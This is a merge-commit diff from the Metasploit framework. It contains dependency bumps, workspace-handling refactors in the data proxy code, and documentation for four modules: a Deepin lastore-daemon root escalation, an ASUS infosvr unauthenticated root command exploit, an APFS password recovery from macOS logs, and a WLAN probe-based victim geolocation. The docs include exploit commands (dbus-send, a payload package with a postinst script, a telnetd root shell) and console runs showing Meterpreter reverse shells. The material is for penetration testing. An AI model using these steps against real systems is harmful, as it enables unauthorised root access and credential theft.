Merge remote-tracking branch 'upstream/master' into feature/drupal
commit 5be4526085

Gemfile.lock (14 changed lines)

@@ -56,7 +56,7 @@ PATH
     rex-socket
     rex-sslscan
     rex-struct2
-    rex-text (< 0.2.18)
+    rex-text
     rex-zip
     ruby-macho
     ruby_smb
@@ -107,7 +107,7 @@ GEM
     arel (6.0.4)
     arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.2)
+    backports (3.11.3)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
     bindata (2.4.3)
@@ -129,7 +129,7 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.14.0)
+    faraday (0.15.0)
       multipart-post (>= 1.2, < 3)
     filesize (0.1.1)
     fivemat (1.3.6)
@@ -201,8 +201,8 @@ GEM
       ttfunk
     pg (0.20.0)
     pg_array_parser (0.0.9)
-    postgres_ext (3.0.0)
-      activerecord (>= 4.0.0)
+    postgres_ext (3.0.1)
+      activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
     pry (0.11.3)
@@ -229,7 +229,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (12.3.1)
     rb-readline (0.5.5)
-    recog (2.1.18)
+    recog (2.1.19)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)
@@ -275,7 +275,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.17)
+    rex-text (0.2.20)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
@@ -0,0 +1,101 @@

## Description

This module attempts to gain root privileges on [Deepin Linux](https://www.deepin.org/en/) systems
by using `lastore-daemon` to install a package. Installing the payload package may trigger audible
and/or graphical notifications on the target confirming the installation.


## Vulnerable Application

The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any
user in the `sudo` group to install arbitrary system packages without
providing a password, resulting in code execution as root. By default,
the first user created on the system is a member of the `sudo` group.

The D-Bus configuration in `/usr/share/dbus-1/system.d/com.deepin.lastore.conf`
permits users of the `sudo` group to execute arbitrary methods on the
`com.deepin.lastore` interface, as shown below:

```xml
<!-- Only root can own the service -->
<policy user="root">
  <allow own="com.deepin.lastore"/>
  <allow send_destination="com.deepin.lastore"/>
</policy>

<!-- Allow sudo group to invoke methods on the interfaces -->
<policy group="sudo">
  <allow own="com.deepin.lastore"/>
  <allow send_destination="com.deepin.lastore"/>
</policy>
```
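
For illustration, a member of the `sudo` group could exercise this configuration directly with `dbus-send`. The object path, interface, and method signature below are assumptions made for this sketch (the module performs an equivalent call programmatically); they are not taken verbatim from the module:

```
# Hypothetical manual invocation; method name and arguments are assumed for illustration
dbus-send --system --print-reply \
  --dest=com.deepin.lastore /com/deepin/lastore \
  com.deepin.lastore.Manager.InstallPackage string:'job' string:'payload-package'
```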

This module has been tested successfully with lastore-daemon version
0.9.53-1 on Deepin Linux 15.5 (x64).

Deepin Linux is available here:

* https://www.deepin.org/en/mirrors/releases/

The `lastore-daemon` source repository is available here:

* https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
* https://github.com/linuxdeepin/lastore-daemon/


## Verification Steps

1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/lastore_daemon_dbus_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session


## Options

**SESSION**

The session to run this module on, which can be viewed with `sessions`.

**WritableDir**

A writable directory path on the target file system (default: `/tmp`).


## Scenarios

```
msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
session => 1
msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Building package...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
[*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
[*] Installing package...
[*] Sending stage (857352 bytes) to 172.16.191.200
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
[+] Deleted /tmp/.1sZZ46ozIH
[+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
[*] Removing package...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.200
OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
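
As the `Building package...` output above suggests, the module assembles a minimal Debian package whose `postinst` maintainer script runs the payload. A hand-rolled equivalent would look roughly like the sketch below; the file names and contents are illustrative assumptions, not the module's exact output:

```
# Hypothetical layout; the module generates something equivalent under a random /tmp directory
mkdir -p pkg/DEBIAN
cat > pkg/DEBIAN/control <<EOF
Package: payload
Version: 1.0
Architecture: all
Maintainer: nobody
Description: illustrative package
EOF
printf '#!/bin/sh\n/tmp/.payload &\n' > pkg/DEBIAN/postinst
chmod 755 pkg/DEBIAN/postinst
dpkg-deb --build pkg payload.deb
```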
@@ -0,0 +1,78 @@

## Description

This module exploits an authentication bypass vulnerability in the infosvr service running on various ASUS routers to execute arbitrary commands as `root`.


## Vulnerable Application

The ASUS infosvr service is enabled by default on various models of ASUS routers and listens on the LAN interface on UDP port 9999. Unpatched versions of this service allow unauthenticated remote command execution as the `root` user.

This module launches the BusyBox Telnet daemon on the port specified in the `TelnetPort` option to gain an interactive remote shell.
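
As a sketch of what this looks like on the device, a BusyBox `telnetd` invocation along these lines would bind an unauthenticated root shell to the chosen port (this assumes BusyBox `telnetd` and `/bin/sh` are present; the exact command the module sends may differ):

```
# Hypothetical equivalent of what the module asks infosvr to execute (TelnetPort=4444 assumed)
telnetd -l /bin/sh -p 4444
```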

This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35.

Numerous ASUS models are [reportedly affected](https://github.com/jduck/asus-cmd), but untested.


## Verification Steps

1. Start `msfconsole`
2. `use exploit/linux/misc/asus_infosvr_auth_bypass_exec`
3. `set RHOST [IP]`
4. `run`
5. You should get a *root* session


## Options

**TelnetPort**

The port for telnetd to bind to (default: `4444`).

**TelnetTimeout**

The number of seconds to wait for the telnet connection (default: `10`).

**TelnetBannerTimeout**

The number of seconds to wait for the telnet banner (default: `25`).

**CommandShellCleanupCommand**

A command to run before the session is closed (default: `exit`).

If the session is killed (CTRL+C) rather than exited cleanly,
the telnet port remains open but unresponsive, preventing
re-exploitation until the device is rebooted.


## Scenarios

```
msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
rhost => 10.1.1.1
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
telnetport => 4444
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
verbose => true
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run

[*] 10.1.1.1 - Starting telnetd on port 4444...
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
[*] 10.1.1.1 - Trying to establish a telnet session...
[+] 10.1.1.1 - Telnet session successfully established...
[*] Found shell.
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500

id
/bin/sh: id: not found
# cat /proc/version
cat /proc/version
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
# exit
exit
```
@@ -0,0 +1,43 @@

This module uses a vulnerability in macOS High Sierra's `log` command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.

## Vulnerable Application

* macOS 10.13.0
* macOS 10.13.1
* macOS 10.13.2
* macOS 10.13.3*

\* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system upgrade to 10.13.3. See [here](https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp) for more info.
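
The underlying issue is that Disk Utility passes the volume password to `newfs_apfs` in a way that ends up in the unified log. As an illustrative sketch of a manual check on an affected system (the exact predicate string is an assumption, not taken from the module), the plaintext can be surfaced with the `log` utility:

```
# Hypothetical manual query; the module automates an equivalent search of the unified log
log show --info --predicate 'eventMessage contains "newfs_"'
```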

## Verification Steps

1. Start `msfconsole`
2. Do: `use post/osx/gather/apfs_encrypted_volume_passwd`
3. Do: set the `MOUNT_PATH` option if needed
4. Do: `run`
5. You should get the password


## Options

**MOUNT_PATH**

`MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`.


## Scenarios

Typical run against a macOS session, after creating a new APFS disk using Disk Utility:

```
msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
SESSION => -1
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit

[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
[*] Post module execution completed
msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
```
@@ -0,0 +1,113 @@

## Description

This module sends probe request packets through the compromised host's WLAN interfaces. The user can configure the message to be sent
(embedded in the SSID field, so at most 32 bytes long) and how many seconds to spend sending those packets
(with a 10 second sleep between each probe request).

The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the
WlanScan API and the DOT11_SSID structure).
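
The 32-byte cap on the message comes from the size of the SSID buffer in the Win32 `DOT11_SSID` structure passed to `WlanScan`; as defined in the Windows SDK (`windot11.h`), it looks roughly like this:

```c
// From the Windows SDK (windot11.h); DOT11_SSID_MAX_LENGTH is 32,
// which is why the embedded message cannot exceed 32 bytes.
typedef struct _DOT11_SSID {
    ULONG uSSIDLength;                           // number of bytes actually used in ucSSID
    UCHAR ucSSID[32 /* DOT11_SSID_MAX_LENGTH */];
} DOT11_SSID, *PDOT11_SSID;
```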

## Scenarios

This post module uses the remote victim's wireless card to beacon a specific SSID, allowing an attacker to
geolocate him or her during an engagement.

## Verification Steps

### Run the module on a remote computer:

```
msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.135.157
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500

meterpreter > sysinfo
Computer        : WIN10X64-1703
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/wlan/wlan_probe_request
msf post(wlan_probe_request) > set ssid "TEST"
ssid => TEST
msf post(wlan_probe_request) > set timeout 300
timeout => 300
msf post(wlan_probe_request) > set session 1
session => 1
msf post(wlan_probe_request) > run

[*] Wlan interfaces found: 1
[*] Sending probe requests for 300 seconds
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(wlan_probe_request) >
```


### On another computer, use probemon to listen for the SSID:

```
tmoose@ubuntu:~/rapid7$ ifconfig -a
.
.
.
wlx00c0ca6d1287 Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

tmoose@ubuntu:~/rapid7$ sudo airmon-ng start wlx00c0ca6d1287

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
963   NetworkManager
981   avahi-daemon
1002  avahi-daemon
1170  dhclient
1180  dhclient
1766  wpa_supplicant

Interface         Chipset            Driver

wlx000000000000   Realtek RTL8187L   rtl8187 - [phy0]
                                     (monitor mode enabled on mon0)

tmoose@ubuntu:~/rapid7$ cd ..

tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
1524248955 74:ea:3a:8e:a1:6d TEST -59
1524248955 74:ea:3a:8e:a1:6d TEST -73
1524248955 74:ea:3a:8e:a1:6d TEST -63
1524248955 74:ea:3a:8e:a1:6d TEST -68
1524248956 74:ea:3a:8e:a1:6d TEST -74
1524248965 74:ea:3a:8e:a1:6d TEST -59
1524248965 74:ea:3a:8e:a1:6d TEST -60
1524248965 74:ea:3a:8e:a1:6d TEST -74
1524248965 74:ea:3a:8e:a1:6d TEST -73
1524248965 74:ea:3a:8e:a1:6d TEST -63
1524248965 74:ea:3a:8e:a1:6d TEST -63
1524248965 74:ea:3a:8e:a1:6d TEST -78
.
.
.
```
@@ -123,6 +123,29 @@ class DataProxy
     raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
   end
 
+  # Adds a valid workspace value to the opts hash before sending on to the data layer.
+  #
+  # @param [Hash] opts The opts hash that will be passed to the data layer.
+  # @param [String] wspace A specific workspace name to add to the opts hash.
+  # @return [Hash] The opts hash with a valid :workspace value added.
+  def add_opts_workspace(opts, wspace = nil)
+    # Some methods use the key :wspace. Let's standardize on :workspace and clean it up here.
+    opts[:workspace] = opts.delete(:wspace) unless opts[:wspace].nil?
+
+    # If the user passed in a specific workspace then use that in opts
+    opts[:workspace] = wspace if wspace
+
+    # We only want to pass the workspace name, so grab it if it is currently an object.
+    if opts[:workspace] && opts[:workspace].is_a?(::Mdm::Workspace)
+      opts[:workspace] = opts[:workspace].name
+    end
+
+    # If we still don't have a :workspace value, just set it to the current workspace.
+    opts[:workspace] = workspace.name if opts[:workspace].nil?
+
+    opts
+  end
+
   #######
   private
   #######
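
Illustrative note (not part of the diff): the normalization above means callers can hand a proxy a `:wspace` key, an `Mdm::Workspace` object, or nothing at all, and the data layer still receives a plain workspace name. A rough sketch of the resulting behaviour, assuming the proxy's current workspace is named `default`:

```ruby
# Illustrative only; mirrors the logic of add_opts_workspace above.
opts = { wspace: 'client-net' }
add_opts_workspace(opts)           # => { workspace: 'client-net' }

add_opts_workspace({}, 'demo')     # => { workspace: 'demo' }

add_opts_workspace({})             # => { workspace: 'default' } (falls back to the current workspace name)
```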
@@ -2,7 +2,7 @@ module CredentialDataProxy
 
   def create_credential(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.create_credential(opts)
     rescue Exception => e
       self.log_error(e, "Problem creating credential")
@@ -12,6 +12,7 @@ module CredentialDataProxy
   def creds(opts = {})
     begin
       data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.creds(opts)
     rescue Exception => e
       self.log_error(e, "Problem retrieving credentials")
@@ -6,6 +6,7 @@ module DbExportDataProxy
         path: path,
         format: format
       }
+      add_opts_workspace(opts)
       data_service.run_db_export(opts)
     rescue Exception => e
       self.log_error(e, "Problem generating DB Export")
@@ -2,7 +2,8 @@ module EventDataProxy
 
   def report_event(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_event(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting event")
@@ -2,7 +2,7 @@ module ExploitDataProxy
 
   def report_exploit_attempt(host, opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.report_exploit_attempt(host, opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting exploit attempt")
@@ -11,7 +11,8 @@ module ExploitDataProxy
 
   def report_exploit_failure(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_exploit_failure(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting exploit failure")
@@ -20,7 +21,8 @@ module ExploitDataProxy
 
   def report_exploit_success(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_exploit_success(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting exploit success")
@@ -1,10 +1,10 @@
 module HostDataProxy
 
-  def hosts(wspace = workspace, non_dead = false, addresses = nil, search_term = nil)
+  def hosts(wspace = workspace.name, non_dead = false, addresses = nil, search_term = nil)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       opts = {}
-      opts[:wspace] = wspace
+      add_opts_workspace(opts, wspace)
       opts[:non_dead] = non_dead
       opts[:address] = addresses
       opts[:search_term] = search_term
@@ -24,7 +24,8 @@ module HostDataProxy
     return unless valid(opts)
 
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_host(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting host")
@@ -33,7 +34,8 @@ module HostDataProxy
 
   def report_hosts(hosts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(hosts)
       data_service.report_hosts(hosts)
     rescue Exception => e
       self.log_error(e, "Problem reporting hosts")
@@ -42,7 +44,7 @@ module HostDataProxy
 
   def update_host(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.update_host(opts)
     rescue Exception => e
       self.log_error(e, "Problem updating host")
@@ -51,7 +53,7 @@ module HostDataProxy
 
   def delete_host(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.delete_host(opts)
     rescue Exception => e
       self.log_error(e, "Problem deleting host")
@@ -2,10 +2,11 @@ module LootDataProxy
 
   def report_loot(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       if !data_service.is_a?(Msf::DBManager)
         opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
       end
+      add_opts_workspace(opts)
       data_service.report_loot(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting loot")
@@ -21,7 +22,7 @@ module LootDataProxy
   def loots(wspace, opts = {})
     begin
       data_service = self.get_data_service
-      opts[:wspace] = wspace
+      add_opts_workspace(opts, wspace)
       data_service.loot(opts)
     rescue Exception => e
       self.log_error(e, "Problem retrieving loot")
@@ -2,7 +2,8 @@ module NmapDataProxy
 
   def import_nmap_xml_file(args = {})
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(args)
       data_service.import_nmap_xml_file(args)
     rescue Exception => e
       self.log_error(e, "Problem importing Nmap XML file")
@@ -1,10 +1,45 @@
 module NoteDataProxy
 
+  def notes(opts)
+    begin
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
+      data_service.notes(opts)
+    rescue Exception => e
+      self.log_error(e, "Problem retrieving notes")
+    end
+  end
+
+  # TODO: like other *DataProxy modules this currently skips the "find" part
+  def find_or_create_note(opts)
+    report_note(opts)
+  end
+
   def report_note(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_note(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting note")
     end
   end
+
+  def update_note(opts)
+    begin
+      data_service = self.get_data_service
+      data_service.update_note(opts)
+    rescue Exception => e
+      self.log_error(e, "Problem updating note")
+    end
+  end
+
+  def delete_note(opts)
+    begin
+      data_service = self.get_data_service
+      data_service.delete_note(opts)
+    rescue Exception => e
+      self.log_error(e, "Problem deleting note")
+    end
+  end
 end
@@ -1,9 +1,9 @@
 module ServiceDataProxy
 
-  def services(wspace = workspace, opts = {})
+  def services(wspace = workspace.name, opts = {})
     begin
-      data_service = self.get_data_service()
-      opts[:workspace] = wspace
+      data_service = self.get_data_service
+      add_opts_workspace(opts, wspace)
       data_service.services(opts)
     rescue Exception => e
       self.log_error(e, 'Problem retrieving services')
@@ -16,7 +16,8 @@ module ServiceDataProxy
 
   def report_service(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_service(opts)
     rescue Exception => e
       self.log_error(e, 'Problem reporting service')
@@ -25,7 +26,7 @@ module ServiceDataProxy
 
   def update_service(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.update_service(opts)
     rescue Exception => e
       self.log_error(e, 'Problem updating service')
@@ -34,7 +35,7 @@ module ServiceDataProxy
 
   def delete_service(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.delete_service(opts)
     rescue Exception => e
       self.log_error(e, 'Problem deleting service')
@@ -1,7 +1,7 @@
 module SessionDataProxy
   def report_session(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.report_session(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting session")
@@ -2,7 +2,7 @@ module VulnAttemptDataProxy
 
   def vuln_attempts(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.vuln_attempts(opts)
     rescue Exception => e
       self.log_error(e, "Problem retrieving vulnerability attempts")
@@ -11,7 +11,8 @@ module VulnAttemptDataProxy
 
   def report_vuln_attempt(vuln, opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_vuln_attempt(vuln, opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting vulnerability attempts")
@@ -3,7 +3,8 @@ module VulnDataProxy
 
   def vulns(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.vulns(opts)
     rescue Exception => e
       self.log_error(e, "Problem retrieving vulns")
@@ -12,7 +13,8 @@ module VulnDataProxy
 
   def report_vuln(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
+      add_opts_workspace(opts)
       data_service.report_vuln(opts)
     rescue Exception => e
       self.log_error(e, "Problem reporting vuln")
@@ -21,7 +23,7 @@ module VulnDataProxy
 
   def update_vuln(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.update_vuln(opts)
     rescue Exception => e
       self.log_error(e, "Problem updating vuln")
@@ -30,7 +32,7 @@ module VulnDataProxy
 
   def delete_vuln(opts)
     begin
-      data_service = self.get_data_service()
+      data_service = self.get_data_service
       data_service.delete_vuln(opts)
     rescue Exception => e
       self.log_error(e, "Problem deleting vuln")
@@ -2,8 +2,9 @@ module WorkspaceDataProxy
 
   def find_workspace(workspace_name)
     begin
-      data_service = self.get_data_service()
-      data_service.find_workspace(workspace_name)
+      data_service = self.get_data_service
+      opts = { name: workspace_name }
+      data_service.workspaces(opts).first
     rescue Exception => e
       self.log_error(e, "Problem finding workspace")
     end
@@ -11,8 +12,9 @@ module WorkspaceDataProxy
 
   def add_workspace(workspace_name)
     begin
-      data_service = self.get_data_service()
-      data_service.add_workspace(workspace_name)
+      data_service = self.get_data_service
+      opts = { name: workspace_name }
+      data_service.add_workspace(opts)
     rescue Exception => e
       self.log_error(e, "Problem adding workspace")
     end
@@ -20,8 +22,11 @@ module WorkspaceDataProxy
 
   def default_workspace
     begin
-      data_service = self.get_data_service()
-      data_service.default_workspace
+      ws = find_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
+      if ws.nil?
+        ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
+      end
+      ws
     rescue Exception => e
       self.log_error(e, "Problem finding default workspace")
     end
@@ -29,38 +34,52 @@ module WorkspaceDataProxy
 
   def workspace
     begin
-      data_service = self.get_data_service()
-      data_service.workspace
+      if @current_workspace
+        @current_workspace
+      else
+        # This is mostly a failsafe to prevent bad things from happening. @current_workspace should always be set
+        # outside of here, but this will save us from crashes/infinite loops if that happens
+        warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
+        @current_workspace = default_workspace
+      end
     rescue Exception => e
       self.log_error(e, "Problem retrieving workspace")
     end
   end
 
+  # TODO: Tracking of the current workspace should be moved out of the datastore. See MS-3095.
   def workspace=(workspace)
     begin
-      data_service = self.get_data_service()
-      data_service.workspace = workspace
+      @current_workspace = workspace
     rescue Exception => e
       self.log_error(e, "Problem setting workspace")
     end
   end
 
-  def workspaces
+  def workspaces(opts = {})
     begin
-      data_service = self.get_data_service()
-      data_service.workspaces
+      data_service = self.get_data_service
+      data_service.workspaces(opts)
     rescue Exception => e
       self.log_error(e, "Problem retrieving workspaces")
     end
   end
 
-  def workspace_associations_counts()
+  def delete_workspaces(opts)
     begin
-      data_service = self.get_data_service()
-      data_service.workspace_associations_counts()
+      data_service = self.get_data_service
+      data_service.delete_workspaces(opts)
     rescue Exception => e
-      self.log_error(e, "Problem retrieving workspace counts")
+      self.log_error(e, "Problem deleting workspaces")
     end
   end
+
+  def update_workspace(opts)
+    begin
+      data_service = self.get_data_service
+      data_service.update_workspace(opts)
+    rescue Exception => e
+      self.log_error(e, "Problem updating workspace")
+    end
+  end
 end
@@ -24,10 +24,11 @@ class RemoteHTTPDataService
   #
   # @param [String] endpoint A valid http or https URL. Cannot be nil
   #
-  def initialize(endpoint, https_opts = {})
+  def initialize(endpoint, framework, https_opts = {})
     validate_endpoint(endpoint)
     @endpoint = URI.parse(endpoint)
     @https_opts = https_opts
+    @framework = framework
     build_client_pool(5)
   end
 
@@ -121,11 +122,11 @@ class RemoteHTTPDataService
   def make_request(request_type, path, data_hash = nil, query = nil)
     begin
       # simplify query by removing nil values
-      query_str = (!query.nil? && !query.empty?) ? append_workspace(query).compact.to_query : nil
+      query_str = (!query.nil? && !query.empty?) ? query.compact.to_query : nil
       uri = URI::HTTP::build({path: path, query: query_str})
       dlog("HTTP #{request_type} request to #{uri.request_uri} with #{data_hash ? data_hash : "nil"}")
 
-      client = @client_pool.pop()
+      client = @client_pool.pop
       case request_type
         when GET_REQUEST
           request = Net::HTTP::Get.new(uri.request_uri)
@@ -223,19 +224,6 @@ class RemoteHTTPDataService
     raise 'Endpoint cannot be nil' if endpoint.nil?
   end
 
-  def append_workspace(data_hash)
-    workspace = data_hash[:workspace]
-    workspace = data_hash.delete(:wspace) unless workspace
-
-    if workspace && (workspace.is_a?(OpenStruct) || workspace.is_a?(::Mdm::Workspace))
-      data_hash[:workspace] = workspace.name
-    end
-
-    data_hash[:workspace] = current_workspace_name if workspace.nil?
-
-    data_hash
-  end
-
   def build_request(request, data_hash)
     request.content_type = 'application/json'
     if !data_hash.nil? && !data_hash.empty?
@@ -248,7 +236,7 @@ class RemoteHTTPDataService
           data_hash.delete(k)
         end
       end
-      json_body = append_workspace(data_hash).to_json
+      json_body = data_hash.to_json
       request.body = json_body
     end
 
@@ -4,8 +4,26 @@ module RemoteNoteDataService
   include ResponseDataHelper
 
   NOTE_API_PATH = '/api/v1/notes'
+  NOTE_MDM_CLASS = 'Mdm::Note'
+
+  def notes(opts)
+    json_to_mdm_object(self.get_data(NOTE_API_PATH, nil, opts), NOTE_MDM_CLASS, [])
+  end
 
   def report_note(opts)
-    self.post_data_async(NOTE_API_PATH, opts)
+    json_to_mdm_object(self.post_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, []).first
+  end
+
+  def update_note(opts)
+    path = NOTE_API_PATH
+    if opts && opts[:id]
+      id = opts.delete(:id)
+      path = "#{NOTE_API_PATH}/#{id}"
+    end
+    json_to_mdm_object(self.put_data(path, opts), NOTE_MDM_CLASS, [])
+  end
+
+  def delete_note(opts)
+    json_to_mdm_object(self.delete_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, [])
   end
 end
@@ -3,55 +3,49 @@ require 'metasploit/framework/data_service/remote/http/response_data_helper'
 module RemoteWorkspaceDataService
   include ResponseDataHelper
 
-  # TODO: should counts be a flag in query data for the workspaces resource?
-  WORKSPACE_COUNTS_API_PATH = '/api/v1/workspaces/counts'
   WORKSPACE_API_PATH = '/api/v1/workspaces'
   WORKSPACE_MDM_CLASS = 'Mdm::Workspace'
-  DEFAULT_WORKSPACE_NAME = 'default'
 
-  def find_workspace(workspace_name)
-    workspace = workspace_cache[workspace_name]
-    return workspace unless (workspace.nil?)
-
-    workspace = json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name}), WORKSPACE_MDM_CLASS).first
-    workspace_cache[workspace_name] = workspace
-  end
-
-  def add_workspace(workspace_name)
-    response = self.post_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name})
-    json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil)
+  def add_workspace(opts)
+    response = self.post_data(WORKSPACE_API_PATH, opts)
+    json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil).first
   end
 
   def default_workspace
-    find_workspace(DEFAULT_WORKSPACE_NAME)
+    json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, { name: Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME }), WORKSPACE_MDM_CLASS, [])
  end
 
   def workspace
-    find_workspace(current_workspace_name)
+    # The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
+    # will not return the correct results. Run it back through the proxy.
+    wlog "[DEPRECATION] Calling workspace from within the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
+    caller.each { |line| wlog "#{line}"}
+    framework.db.workspace
   end
 
   def workspace=(workspace)
